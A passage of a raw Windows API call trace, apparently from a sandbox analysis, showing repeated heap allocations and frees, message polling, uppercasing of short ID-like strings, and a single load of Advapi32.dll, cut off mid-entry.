RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0258.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.355] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0258.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.356] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.356] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.356] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.356] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.357] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa940 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.357] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.357] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.358] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.358] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.360] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.361] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.361] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.362] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.362] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0258.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.363] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.363] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0258.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.364] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.364] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.364] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.365] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 